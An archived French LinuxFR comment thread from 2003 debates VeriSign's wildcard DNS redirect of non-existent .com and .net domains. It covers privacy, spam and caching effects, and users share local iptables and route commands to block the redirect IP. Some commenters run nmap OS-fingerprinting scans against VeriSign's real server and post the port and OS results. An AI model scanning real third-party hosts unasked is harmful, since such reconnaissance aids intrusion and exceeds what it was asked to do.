 
 Un honeypot a mail :-)
 Un faux serveur SMTP qui logge tous les details des mails recus.
 
 Mais que fait Sarkozy !!!!!!
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Boa Treize (site web personnel) le 16 septembre 2003 à 17:48. Évalué à 2.
 
 Bon, c'est bien, mais qui te dis qu'il ne garde pas de côté les deuxième et troisième messages du client (qui dans l'immense majorité des cas sera l'adresse de l'expéditeur et l'adresse du destinataire) ?
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Bemixam (site web personnel) le 17 septembre 2003 à 14:01. Évalué à 1.
 
 la aussi il va falloir faire un script qui fausse les stats ! hehehe
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Ju. le 16 septembre 2003 à 17:46. Évalué à 6.

L'analyse de NetEconomie : (VF)
http://www.neteconomie.com/perl/navig.pl/neteconomie/infos/article/(...)

La news Yahoo : (VO)
http://story.news.yahoo.com/news?tmpl=story&u=/washpost/2003091(...)

Et pour eviter les redites :
http://linuxfr.org/~inside/5384.html(...)
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par _alex le 16 septembre 2003 à 17:46. Évalué à 8.

Ce qui est aggaçant : même si au bout d'une semaine ils font machine arrière, ils ont des logs d'une semaine surtout les noms de domaines non existant demandés, sur une quantité de refer, et cookie collosalle. Et qu'importe si leurs serveurs sont saturés....
Et je pense que ça vaut son pesant d'or ce genre d'information....

C'est l'idée (peut être fausse) que je m'en fait (je n'ai pas lu leurs doc)
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Obsidian le 16 septembre 2003 à 17:51. Évalué à 5.
  
  A mon avis, wildcard ou pas, si on possède les root DNS, on a déjà une vision globale des requêtes sur les noms de domaines.
  
  Par contre, les refer/cookie et autres sont effectivement une nouveauté.
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par pef le 16 septembre 2003 à 17:47. Évalué à 9.

En vous trompant dans une url, n'oubliez pas que cela vous vaut l'acceptation de la license de la page Verisign :

http://sitefinder.verisign.com/terms.jsp(...)

En plus ils sont super sympa, morceaux choisis :

The VeriSign Services complement our DNS resolution service and provide information that may prove useful to you in locating the resources you originally intended to access

"Ce service complète la résolution d'url et vous donne des infos (liens commerciaux ?) vers les informations que vous tentiez d'obtenir.

If you want to make commercial use of the VeriSign Services, you must enter into an agreement with us to do so in advance.

En gros ils disent que si vous voulez mettre de la pub il faut les contacter ?

The VeriSign Service may automatically display categories and links to other third party web sites.

Là je crois que c'est clair, des liens commerciaux.

J'oubliais de relever où il est dit qu'en utilisant la page vous acceptez d'office les conditions :

By using the service(s) provided by VeriSign under these Terms of Use, you acknowledge that you have read and agree to be bound by all terms and conditions here in and documents incorporated by reference

Eh bin, ca promet.
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Vivi (site web personnel) le 16 septembre 2003 à 19:23. Évalué à 4.
  
  à ce propos voir :
  
  http://www.hinterlands.org/ver/txt/(...)
  
  ça explique comment en téléphonant à verisign et en leur expliquant que tu refuses les confitions du ToU, ils peuvent retirer ton bloc IP de leur liste de blocs à qui il servent le wildcard. Mais c'est pour l'UK (et rien ne dit qu'ils fassent vraiment).
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par Anonyme le 16 septembre 2003 à 19:30. Évalué à 2.
    
    On devrait exiger de nos fournisseur d'accès d'avoir leurs blocs IP de leur liste.
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par William Steve Applegate (site web personnel) le 17 septembre 2003 à 00:07. Évalué à 6.
    
    C'est quoi ce numéro ? Un numéro aux É-U ? Je suppose que non, puisqu'il ne commence pas par 1. En Angleterre, alors ? Est-il accessible depuis la France (hmmm... 0800... j'ai un doute) ? En plus, malgré mon nom, je parle pas Anglais (je l'écris, mais je le parle pas compréhensiblement, normal ch'uis tout le temps avec des Français :-) Je fais comment, moi à faire comprendre à Verisign qu'il faut qu'ils arrêtent de polluer mes requêtes ?
    
    Autre chose : en admettant qu'ils mettent effectivement une ACL pour servir des zones différentes si on leur demande, cela risque de devenir un beau bordel. Par exemple, si mon FAI (Nerim) ne demande pas ça, mais que moi et plein d'autres clients avec une IP le demandent, ils mettent tous les /32 dans l'ACL ? Ça va être joyeux ! Et si une personne qui a une IP dynamique demande, ils font comment ? Ils rajoutent toutes les plages IP du FAI sans demander leur avis aux admins (encore que, après tout ils n'ont demandé l'avis de personne avant de mettre ça en place, donc...) ?
    
    Bon, quoi qu'il en soit, j'ai trouvé sur /. un lien vers un formulaire ICANN pour gueuler contre les registrars [http://reports.internic.net/cgi/registrars/problem-report.cgi(...)] et j'y ai dit ce que je pensais de la clique de Verisign GRS. J'ai bien pensé à préciser le problème du spam qui augmente faute de contrôle sur les domaines inexistants, le trafic inutile à cause des accès à leur site poubelle, les problèmes pour résoudre les ennuis des utilisateurs lorsque les messages d'erreur habituels n'apparaissent pas, la non-conformité de leur script qui tient lieu de serveur SMTP, etc. N'hésitez pas à faire la même chose ! Même l'ICANN est pas enchantée de voir le registre faire cavalier seul (surtout que du coup, ils touchent rien >:-) Donc, si on gueule suffisamment, ça risque de bouger.
    Envoyé depuis mon PDP 11/70
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par pef le 16 septembre 2003 à 17:49. Évalué à 1.

N'est-il pas plus intéressant de renvoyer un ICMP Host Unreachable pour une demande vers cette IP plutôt que de la null router / rediriger vers 127.0.0.1 ?
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par _alex le 16 septembre 2003 à 18:21. Évalué à 1.
  
  Est-ce que c'est possible en Iptable ?
  - [^] #
    
    Posté par Francois Revol (site web personnel) le 16 septembre 2003 à 18:33. Évalué à 4.
    
    route add -host 64.94.110.11 gateway 127.0.0.1
    Mais ça ne permet pas de restaurer le comportement normal.
    Pire, si tu as un serveur web local ça va poser problème.
    Si tu as un smtpd local, tu risques même d'entrer dans des boucles sans fin...
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par LupusMic (site web personnel, Mastodon) le 16 septembre 2003 à 22:57. Évalué à 1.
      
      Il n'y a pas un système de jeton qui indique que le paquet n'est plus valide au bout d'un certain temps ?
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Keos le 17 septembre 2003 à 12:12. Évalué à 1.
        
        Lol oui on appel ca le TTL
        
        [^] #
        
        Posté par Francois Revol (site web personnel) le 17 septembre 2003 à 15:13. Évalué à 2.
        
        oué, mais bon même avec 64 ou 32 de TTL ça va augmenter le temps CPU pour traiter tout ça, sans compter les timeouts, ni les éventuels stack overflow :)
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par vazco le 16 septembre 2003 à 18:39. Évalué à 9.
    
    iptables -I OUTPUT 1 -d 64.94.110.11 -j REJECT --reject-with icmp‐host‐prohibited
    
    mais bon, c'est bourrin.
    
    Tiens, c'est curieux... iptables gueule contre icmp‐host‐prohibited. Va falloir que j'examine ça.
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par vazco le 16 septembre 2003 à 19:23. Évalué à 1.
      
      NB: C'est bourrin mais ça vaut 100 fois mieux que de rediriger vers localhost, puisque on retrouve au moins un comportement normal : cible inaccessible.
      - [^] #
        
        Posté par Francois Revol (site web personnel) le 16 septembre 2003 à 19:59. Évalué à 3.
        
        non, pas normal.
        Il y a une différence entre "non accessible" et "inexistant".
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par vazco le 16 septembre 2003 à 20:19. Évalué à 1.
        
        On est bien d'accord, mais en attendant de transformer les réponses DNS 64.94.110.11 en "inexistant", c'est le mieux que l'on puisse faire. Mieux que de rediriger vers localhost, en tout cas. Tu le reconnais d'ailleurs toi-même : à partir du moment où un service tourne sur localhost, tu t'exposes à des emmerdements sans nom.
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par _alex le 16 septembre 2003 à 22:58. Évalué à 1.
        
        Mozilla n'affiche ni erreur, ni page blanche : comme si on avais rien fait. Ping met au bout d'un moment : "ping: sendmsg: Operation not permitted"
        Par contre, finish les request sur leurs serveurs ...
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par vazco le 16 septembre 2003 à 23:47. Évalué à 1.
        
        Mozilla m'affiche une boîte de dialogue :
        connexion refusée lors de la tentative de contact de verisign-suxor-des-ours.com
        
        Qu'est ce que tu as fait, exactement ?
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par gebura le 17 septembre 2003 à 19:19. Évalué à 0.
  
  Heu a mon avis mettre un joker pour les .com (*.com) serait bien plus simple, car cette adresse risque de changer et si elle le fait trop souvent ca va etre vite gallere a gerer.
  M en vais mettre a jour mon dns...
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par dinomasque le 16 septembre 2003 à 17:49. Évalué à 2.

J'ai beau lire et relire la news, je ne comprend toujours pas quel est le problème.
Quelqu'un aurait-il l'aimabilité de tenter de me l'expliquer ?
BeOS le faisait il y a 20 ans !
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par farib le 16 septembre 2003 à 18:00. Évalué à 1.
 
 bah tous les noms de domaines qui existent pas existent et sont verisign :/
 
 http://dsfkmdsjfsmdfjsmdfjsdmfsjd.ds5fs6dfsd.fdsfsqd.com(...)
 http://dsfsdfsdfsdfsdf6414sf7sdf7s.net(...)
 
 etc...
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Tartine le 16 septembre 2003 à 19:18. Évalué à 1.
 
 => "Pas de réponse du serveur" : évidemment il est saturé, l'hôte !
 à comparer au "Hôte n'existe pas " pour un n'importe quoi en .org
 (dixit Konqueror)
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Annah C. Hue (site web personnel) le 16 septembre 2003 à 18:00. Évalué à 10.
 
 Fonctionnement normal : http://linusquefr.org/(...)
 Escroquerie par verisign : http://linusquefr.com/(...)
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par animal_omega le 16 septembre 2003 à 18:00. Évalué à 1.
 
 avant, quand tu faisais une requete DNS du type "donne moi l'IP qui correspond a ce nom" et que ce nom n'existait pas, le serveur DNS te repondait qu'il n'existait pas.
 maintenant, le serveur DNS te repondras que c'est 64.94.110.11
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Rossel Olivier le 16 septembre 2003 à 18:01. Évalué à 4.
 
 Si tu te gourres dans une URL, tu finis chez VeriSign.
 Ca a des consequences assez deplaisantes si la requette HTTP
 contient des informations sensibles (genre ton numero de CB :-)
 
 Si tu te gourres dans une adresse mail d'envoi, ca finit chez VeriSign.
 Ca leur fait de la lecture.
 
 Tiens, au fait, quand on est dans une session HTTPS et qu'on clique submit, mais que le submit (pour une raison X ou Y) pointe vers une adresse invalide, est-ce que Verisign recoit en clair les donnees POSTees?
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Sébastien Koechlin le 16 septembre 2003 à 18:17. Évalué à 4.
 
 Non pour deux raisons :
 
 - La machine poubelle de VeriSign n'accepte pas les connexions sécurisées.
 
 - Normalement, ton navigateur doit te prévenir que le nom du certificat ne correspond pas au nom de la machine que tu cherches à joindre. Comme l'échange des certificats se fait avant de préciser le nom de la machine, il n'est pas possible pour le serveur de générer le bon certificat à chaque coup.
 
 Je dis "normalement" parce qu'aux dernières nouvelles, microsoft avait du mal à implémenter ce genre de vérification dans IE.
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Talou (site web personnel) le 16 septembre 2003 à 21:58. Évalué à 1.
 
 bah tiens... mais le serveur reçoit quand même l'url, ne particulier grâce à IE (combien de parts de marché déjà ?)
 C'est facile de simuler un refus... les logs en sont remplis !
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par dinomasque le 16 septembre 2003 à 22:41. Évalué à -5.
 
 Mais si tu tapes amazone.com et que le site est enregistré il y a le même "problème"
 Pareil pour les adresses email toto_titi@bidule.com n'est peut être pas la même personne que toto.titi@bidule.com.
 
 Il n'y a donc strictement rien de nouveau. Il faut vraiment avoir envie de crier au scandale et faire preuve de mauvaise foi pour faire tout un plat de ce non évènement.
 BeOS le faisait il y a 20 ans !
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par _alex le 16 septembre 2003 à 23:10. Évalué à 7.
 
 C'est un peu comme si a chaque que tu compose un numéro non attribué de téléphone tu tombais sur un standard te demandant où tu veux aller et te diffuse de la pub :
 
 - 1/ c'est très pénible, encors de la pub dans un coin qui était tranquille (le jour ou ya de la pub dans le ciel à la place des étoiles dans une zone hors de la ville je péte un cable)
 
 - 2/ pour un programme informatique : il est incapable de savoir "je dialogue avec celui que veux" ou pas. Exemple tout bête : un programme de mise à jour télécharge des données, le site change, comment savoir au niveau du programme que le site à changer si verisign réponds toujours par défaut.
 
 - 3/ le standard téléphonique/verifsign collecte une somme collossale d'information sur nos habitudes et je maintient que ca vaut de l'or ces info à revendre (les cookies et les refer, les mails). Personnellement j'ai pas envis qu'une boite collecte des info sur moi de cette façon (avis perso)
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Olivier BENDRIES (site web personnel) le 17 septembre 2003 à 00:02. Évalué à -4.
 
 Tu oublie une boite qui collecte des infos à la tonnes toutes les secondes à la maniere dont tu ne veux pas entendre parler: google
 J'veux pas tirer sur le gentil poulet, mais cette poule au oeuf d'or qu'est google est très loin d'être transparente (info : http://www.google-watch.org(...) )
 
 Quand est-ce qu'on mets en place ce reseau parallele à internet en wireless et open à tous ?¿? ( --> airnet 'nd co )
 
 [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Clément Stenac (site web personnel) le 17 septembre 2003 à 00:43. Évalué à 6.
 
 Cf troll précédent
 
 et http://www.google-watch-watch.org(...)
 
 Google n'est certes pas la perfection, mais de là à l'accuser de tout...
 
 Et puis, tu n'es pas obligé d'aller sur google, même si tu poliotes une adresse.
 
 Sur vérisign, si
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par dinomasque le 17 septembre 2003 à 09:27. Évalué à -2.
 
 C'est donc exactement ce qui se passe actuellement avec les petits malins qui achètent des noms de domaines prochent de ceux de sites réels.
 BeOS le faisait il y a 20 ans !
 
 [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Obsidian le 17 septembre 2003 à 12:02. Évalué à 9.
 
 Non, ce n'est pas la même chose.
 
 - Le but est identique, même si c'est non avoué.
 
 - En pratique, un cybersquatteur - contre lequel des lois ont déjà été votées - ne peut pas acheter l'intégralité des noms de domaines non encore déposés. La différence est colossale entre VeriSign et ces gens-là.
 
 - Outre le coté moral, cela va poser des problèmes techniques à tout le monde: l'un des piliers de l'Internet, probablement le protocole le plus utilisé sur le réseau, vient d'être modifié unilatéralement par une compagnie unique pour ses intérêts personnels, du jour au lendemain, sans aucun préavis et évidement aucune consultation des acteurs concernés (potentiellement tout le monde). Tout cela soit disant pour te proposer des liens qui se rapprochent de celui que tu cherches ! Cette unique justification, ils ne la remplissent même pas puisque leurs serveurs (web) sont saturés.
 
 Ce n'est pas un simple cybersquatting de noms de domaines effectivement réservés, te rends-tu compte que le message standard "Host unknown" n'existe plus dans les zones .com et .net ?
 
 Il va falloir réécrire des démons spéciaux pour regénérer ce message lorsque l'adresse aura été résolue en 64.94.110.11 pour espérer retrouver un comportement normal, et cela simplement à cause du fait que les gens à qui on a confié la gestion d'un des systèmes critiques régulant le Net sont des irresponsables !
 
 Et tu appelles cela un non-événement ?
 
 [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par dinomasque le 17 septembre 2003 à 16:27. Évalué à -6.
 
 te rends-tu compte que le message standard "Host unknown" n'existe plus dans les zones .com et .net ?
 
 Oui et hier j'ai mis des chaussettes marron. Ai-je sapé les fondements d'Internet ?
 
 Et tu appelles cela un non-événement ?
 Oui tout à fait.
 En quoi le "comportement" normal est-il si important ? Personne ne l'a expliqué, tout le monde se contente ici de crier au loup sans raison précise.
 
 Ce n'est qu'un détail technique qui ne cause AUCUN problème nouveau. Juste une affaire de techniciens effarouchés.
 BeOS le faisait il y a 20 ans !
 
 [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par remi le 17 septembre 2003 à 17:27. Évalué à 3.
 
 Je vois au moins un problème:
 
 Imagine qu'un nouveau virus sorte et que ce virus s'amuse à faire l'équivalent d'un "dig A domaine-aleatoire.{com,net}", plusieurs centaines de fois par seconde.
 
 Une fois ce virus propagé, tous les caches DNS dans les entreprises vont exploser, (sauf ceux configurés avec des limites raisonnables), provoquant ainsi un ralentissement à mon avis notable d'internet.
 
 ET je suis persuadé que ce genre de problème va se poser avec tout plein de programmes, genre un cache web par exemple, qui va s'amuser à cacher la page de verisign autant de fois qu'un nouveau domaine aura été demandé. D'ou une saturation du cache à nouveau.
 
 [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Raphaël SurcouF (site web personnel) le 18 septembre 2003 à 06:39. Évalué à 1.
 
 "ET je suis persuadé que ce genre de problème va se poser avec tout plein de programmes, genre un cache web par exemple, qui va s'amuser à cacher la page de verisign autant de fois qu'un nouveau domaine aura été demandé. D'ou une saturation du cache à nouveau."
 
 Pas tout à fait: le but d'un serveur-cache est précisément d'éviter de renvoyer la même requête sur le contenu a déjà été rendu.
 Evidemment, si le serveur web de VeriSign dispose des directives HTTP adéquates (No-Pragma-Cache, je n'ai plus le nom exact en tête) ou que le rendu est par trop dynamique, alors les serveurs caches n'auront pas plus de problèmes qu'avec d'autres sites normaux: c'est la liaison qui devra dès lors supporter des requêtes supplémentaires.
 
 [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par remi le 18 septembre 2003 à 09:47. Évalué à 4.
 
 Sauf que si tu demandes la home de 4 millions de domaines pipo différents, le cache web (c'est le cas de squid) va cacher 4 millions de fois la même page.
 
 Quand squid cache une page, il ne compare pas le contenu de la page en question avec tout son cache pour savoir s'il l'a déjà ou pas, il compare seulement les url. (imagine le temps de traitement sinon ...)
 
 [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par GCN (site web personnel) le 18 septembre 2003 à 13:28. Évalué à 3.
 
 Sauf erreur, si je tape: http://www.verisucks.com(...) je suis redirigé sur http://sitefinder.verisign.com/lpc?url=www.verisucks.com&host=w(...)
 
 Apparemment, tout nom de domaine inexistant se voit redirigé vers sitefinder.verisign.com. Donc j'imagine qu'un proxy cache, tel que squid, va mettre en cache sitefinder.verisign.com et pas www.verisucks.com ?!
 
 Je ne pense pas que ça va faire exploser le proxy en le gavant de milliers d'URLs invalides...
 
 [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par vazco le 17 septembre 2003 à 22:19. Évalué à 10.
 
 Puisque apparemment le simple fait de créer du trafic superflu et des timeout inutiles, d'agir au mépris des standards et de priver les utilisateurs d'une information qu'ils sont légitimement en droit d'attendre, ne suffit pas, je vais te donner un exemple très simple de dysfonctionnement, et qui touche M. toulmonde :
 
 M. Toulmonde a une petite fonction sympa dans son navigateur : au lieu de taper une adresse complète, quand il veut accéder à Tonsite, il tape juste "Tonsite". Le navigateur essaie tout seul de compléter en "http://www.tonsite.com(...)". Si le dns lui répond que tonsite.com n'existe pas, il essaie .net, puis .org, puis .fr. etc. Désormais, grâce aux chaussettes marron de vairisagne, tonsite.com fait bingo à tous les coups. Dommage si c'était en fait tonsite.net (cf. framasoft). M. toulmonde à intérêt à taper des adresses complètes s'il ne veut pas être régulièrement confronté à une page qui essaiera au passage éventuellement de le réorienter vers pastonsite.com.
 
 Ça n'a l'air de rien, n'est-ce pas ? C'est pas si grave... Mais ça rend les choses plus pénibles qu'elles ne l'étaient pour M. Toulmonde. Ça incitera tonsite.net à réserver aussi tonsite.com, et tnosite.com, et .net, comme au temps où le cybersquat était le Business Plan du mois... Ça incitera tonsite et pastonsite à surenchérir pour que la recherche de "tonsite" soit judicieusement guidée... C'est ce que souhaite Verisign, en tout cas.
 
 Si une adresse ne se trouve pas dans sa base données, Verisign doit dire « cette adresse n'est pas dans ma base de données » et pas « T'as perdu tes parents ? Viens chez moi, petite, je te donnerais des bonbons. »
 Chacun exploitera cette information à sa convenance. Il est de la responsabilité de Verisign de la donner.
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Cédric Blancher le 16 septembre 2003 à 23:18. Évalué à 10.
 
 On peut épiloguer pas mal de temps sur les implications techniques de cet action et ne jamais arriver à s'accorder sur l'impact positif (?!), nul ou négatif de la chose. Moi, ce qui me dérange dans cette affaire, c'est qu'une société commerciale, qui est aussi autorité de certification*, se permette d'abuser d'un service communautaire à ses propres fins.
 
 Bref, c'est plus une question d'éthique que de technique amha, et finallement je m'interroge énormément sur la confiance qu'on peut accorder à ces sociétés pour la fourniture de services aussi importants.
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par dinomasque le 17 septembre 2003 à 09:28. Évalué à 0.
 
 Enfin une vraie réponse. Merci.
 BeOS le faisait il y a 20 ans !
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Christophe Morvan (site web personnel) le 16 septembre 2003 à 23:31. Évalué à 2.
 
 Mais si tu tapes amazone.com et que le site est enregistré il y a le même "problème"
 
 Effectivement, mais là quel que soit la connerie que tu fasse, tu arrives chez eux...
 Si tu considère le nombre collossal de domaines enregistrés, et que tu réfléchis qu'il y a des dizaines de permutations très proches... et des millions plus éloigné pour _chaque_ site... alors tu comprend qu'utiliser cette « wildcard » donne un avantage commercial très fort.
 
 C'est un peu comme si, lorsque tu achètes un nom de domaine, verisigne s'accorde _tous_ ceux qui sont proches... et si tu en achète quelques un ils leur reste encore tous les autres...
 
 Pareil pour les adresses email toto_titi@bidule.com n'est peut être pas la même personne que toto.titi@bidule.com.
 
 ??? que veux-tu dire ?
 
 Si tu as le domaine bidule.com tu reçois les deux messages et c'est toi qui gère, là ils n'ont rien à voir. Si tu n'as pas ce domaine, ce n'est pas un problème
 
 Ce qui est embêtant c'est que si toi (omar@mollah.com) envoies un message à ben@laden.com et que tu écris (par erreur) ben@leden.com, ils peuvent en garder une trace chez verisign... ce qui peut être un souci pour toi par la suite (sauf si leden.com a déjà été enregistré par ton copain prévoyant... ou par echelon ;o)).
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Julien Duponchelle (site web personnel) le 16 septembre 2003 à 18:04. Évalué à 2.
 
 Le probléme c'est que si tu te trompe dans l'adresse au lieu d'avoir un simple message de ton navigateur te disant que l'adresse n'existe pas tu va être redirigé vers verisign idem pour les mails.
 
 Par exemple un spammeur pourra dire que le mail vient de jesuisunspammeur@spammmmmmmmmmmmeur.com et ton logiciel antispam croiera que le domaine existe bien.
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par dinomasque le 16 septembre 2003 à 22:41. Évalué à 4.
 
 le spammeur peut deja me faire croire que son email est security@microsoft.com j'en reçois 2 par jour en ce moment.
 BeOS le faisait il y a 20 ans !
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par analogue o/ (site web personnel) le 16 septembre 2003 à 18:51. Évalué à 8.
 
 Conséquences:
 
 - Toutes les urls avec un noms de domaine incorrect dans .com et .net
 que tapent vos utilisateurs arrivent chez eux. Bonjour la confidentialité.
 
 - Tous les mails avec des domaines incorrects que vos utilisateurs envoient
 finissent chez eux. Actuellement ils bouncent des la phase SMTP, mais
 rien ne dit qu'ils ne gardent pas dans une liste une jolie liste
 de domaines à créer et d'adresses emetteur et destinataires.
 
 - Plus grave : Tous les spammeurs vont pouvoir a nouveau utiliser
 n'importe quoi dans leur enveloppe SMTP (il faut espérer que l'effet
 de bord qui consistera a flooder le serveur de Verisign avec des
 bounces sera suffisant pour qu'ils crevent la bouche ouverte).
 
 *PIRE*, Verisign est present dans *tous* nos navigateurs, on peut
 imaginer que les glorieux marketoïdes qui sont derriere tout ça
 vont générer automatiquement des certificats SSL qui seront corrects
 pour n'importe quelle faute de frappe.
 
 source: <slrnbmdf2a.toq.at-2003-03@roadrunner.rominet.net>
 
 Et il y en a d'autres...
 - [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Kalex le 16 septembre 2003 à 20:01. Évalué à 4.
 
 Et en plus, c'est même pas valide :
 http://validator.w3.org/check?uri=http%3A%2F%2Fsitefinder.verisign.(...)
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Prosper le 16 septembre 2003 à 17:59. Évalué à 5.

le pire dans c ette histoire c est que les domaines .com et .net dont les nameservers sont pas rensignés dans le whois ( par exemple en cours d enregistrement / changement d herbregeur / delete ou tout autre raison ) sont redirigés aussi chez verisign !

donc si j achete verisign-bande-de-cons.com et que pour une raison qui m ai propre j ai pas envie de mettre de dns , bin ca va chez verisign super...
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Anonyme le 16 septembre 2003 à 19:21. Évalué à 2.
  
  Je me demande comment ça peut-être légal ça. Les ISP devraient bloquer ce type de comportement.
# Hum...

Posté par lockness le 16 septembre 2003 à 18:07. Évalué à 1.

# nmap -O 64.94.110.11

Starting nmap 3.27 ( www.insecure.org/nmap/ ) at 2003-09-16 18:04 CEST
Note: Host seems down. If it is really up, but blocking our ping probes, try -P0
Nmap run completed -- 1 IP address (0 hosts up) scanned in 17.315 seconds

-> Bye bye !
- [^] # Re: Hum...
  
  Posté par Rossel Olivier le 16 septembre 2003 à 18:13. Évalué à 1.
  
  le port 25 de cette IP repond toujours chez moi.
  Je pense qu'il y a une belle batterie de machines derriere cette IP :-)
- [^] # Re: Hum...
  
  Posté par ramzez le 16 septembre 2003 à 18:33. Évalué à 2.
  
  comme nmap te l'indique : tu dois utiliser l'option -P0 parce que verisign ne semble pas réponde aux pings ;)
  - [^] # Re: Hum...
    
    Posté par Jean-Marc Leroy le 17 septembre 2003 à 12:18. Évalué à 5.
    
    aaricia root # nmap -O -P0 64.94.110.11
    Starting nmap 3.30 ( http://www.insecure.org/nmap/(...) ) at 2003-09-17 12:14 UTC
    Interesting ports on sitefinder-idn.verisign.com (64.94.110.11):
    (The 1637 ports scanned but not shown below are in state: closed)
    Port State Service
    23/tcp filtered telnet
    25/tcp open smtp
    79/tcp filtered finger
    80/tcp filtered http
    161/tcp filtered snmp
    162/tcp filtered snmptrap
    514/tcp filtered shell
    Device type: broadband router|general purpose|router
    Running (JUST GUESSING) : Draytek embedded (96%), Siemens embedded (93%), Linux 2.4.X|2.5.X (93%), FreeSCO Linux 2.0.X (93%)
    Aggressive OS guesses: Draytek Vigor 2200e DSL router v2.1b (96%), Siemens Speedstream 2602 DSL/Cable router (93%), Microsoft Xbox running Debian Linux 2.4.20 (93%), FreeSCO 0.27 (Linux kernel 2.0.38) (93%), Linux kernel 2.2.16 (93%), Linux kernel 2.4.20 (93%), Linux kernel 2.4.18 (x86) (90%), Linux kernel 2.4.19 (X86) (87%), Linux Kernel 2.4.0 - 2.5.20 (87%), Linux Kernel 2.4.18 - 2.5.70 (X86) (87%)
    No exact OS matches for host (test conditions non-ideal).
    
    Nmap run completed -- 1 IP address (1 host up) scanned in 90.622 seconds
    
    hmmmm........
    - [^] # Re: Hum...
      
      Posté par m4k_pem le 17 septembre 2003 à 14:42. Évalué à 1.
      
      Donc c'est parce que leur site tourne sur xBox qu'il est si lent ? :)
      Je ne suis pas un pro, mais à quoi peut bien leur servir un smtp ouvert ? Ils pourraient au moins consacrer une machine entière à cette page, vu qu'elle est en passe de devenir la plus visitée au monde.
      - [^] # Re: Hum...
        
        Posté par Mr F le 07 octobre 2003 à 18:05. Évalué à 1.
        
        Donc c'est parce que leur site tourne sur xBox qu'il est si lent ? :)
        
        N'importe quoi. Mais vraiment. Le cpu n'a pas grand chose à voir avec de la haute disposition de page web, c'est généralement la bande passante qui en premier sature (voir même le loadbalancer).
        Ensuite un cpu à 733 mhz est très très largement suffisant sur un serveur pour des pages web. Par contre 64mo de ram c'est vraiment peu.
        
        Leur saturation des premiers jours venait de l'insuffisance du nombre de serveurs de leur architecture (ils ont probablement d'abord voulu estimer la charge nescessaire, vu que la disponibilité est rapidement arrivé, plus rapidement qu'une livraison de serveur tout frais), ou de leur loadbalancer, ou même de leur bande passante...
        
        Je ne suis pas un pro, mais à quoi peut bien leur servir un smtp ouvert ? Ils pourraient au moins consacrer une machine entière à cette page, vu qu'elle est en passe de devenir la plus visitée au monde.
        
        Tu crois vraiment qu'il y a un seul serveur derriere tout ça ?
        Il y a plutôt un loadbalancer et différentes fermes.
    - [^] # Re: Hum...
      
      Posté par Mr F le 07 octobre 2003 à 18:10. Évalué à 1.
      
      Moi j'aurais plutôt mis en gras JUST GUESSING.
      Je ne suis pas sûr que l'on puisse vraiment prendre très au sérieux cette liste. (y'a beaucoup de >90%).
      Et ensuite un parc de serveurs est généralement homogéne aussi bien matériellement que logiciellement. Surtout pour un même service (c'est beaucoup plus simple à administrer).
      J'sais pas trop ou Nmap à trouvé tout ça, sous le sabot d'un cheval surement :-)
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Ph Husson (site web personnel) le 16 septembre 2003 à 18:16. Évalué à -2.

Ben mince alors,
ça marche pas chez moi c'est bête!!!

PS:et c'est même pas un serveur privé!
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Vincent le 16 septembre 2003 à 18:17. Évalué à 7.

64.94.110.11... humm une IP dont la bande passante risque d'être utilisée à 1000% 100% du temps.
